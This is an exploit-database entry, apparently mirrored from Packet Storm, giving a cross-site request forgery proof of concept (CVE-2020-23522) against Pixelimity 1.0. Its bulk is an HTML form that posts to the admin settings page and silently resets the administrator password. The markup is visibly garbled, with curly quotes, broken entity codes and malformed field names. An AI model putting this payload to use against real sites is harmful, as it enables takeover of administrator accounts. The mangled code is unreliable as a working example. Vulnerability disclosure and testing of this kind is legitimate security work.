Exploit for Pixelimity 1.0 Cross Site Request Forgery CVE-2020-23522

## https://sploitus.com/exploit?id=PACKETSTORM:161276
# Exploit Title: Pixelimity 1.0 - 'password' Cross-Site Request Forgery  
# Date: 2020-06-03  
# Exploit Author: Noth  
# Vendor Homepage: https://github.com/pixelimity/pixelimity  
# Software Link: https://github.com/pixelimity/pixelimity  
# Version: v1.0  
# CVE : 2020-23522  
  
Pixelimity 1.0 has cross-site request forgery via the admin/setting.php data [Password] parameter.  
  
PoC :  
  
<html>  
<body>  
<script>history.pushState(",",'/')</script>  
<form action=“http://127.0.0.1/pixelimity-dev/admin/setting.php  
” method=“POST”>  
<input type=“hidden” name=“submit_setting” value=“Save Setting”/>  
<input type=“hidden” name=“data[admin_portfolio_show]”  
value=“5”/>  
<input type=“hidden” name=“data[admin_pages_show]”  
value=“5”/>  
<input type=“hidden” name=“admin[data_password]”  
value=“456789”/>  
<input type=“hidden” name=“data[site#95;name]"  
value=“Pixelimity”/>  
<input type=“hidden” name=“data[site_name]show]”  
value=“My Online Portfolio”/>  
<input type=“hidden” name=“data[home_image_size&#93” value=“5”/>  
<input type=“hidden” name=“ data[single_image_image_size#93  
” value=“ 240&44;0,0&44;auto ”/>  
<input type=“hidden” name=“data[single_image_image_size#93”  
value=“720&44;0,0&44;auto”/>  
<input type=“submit” value=“Submit request”/>  
</form>  
</body>  
</html>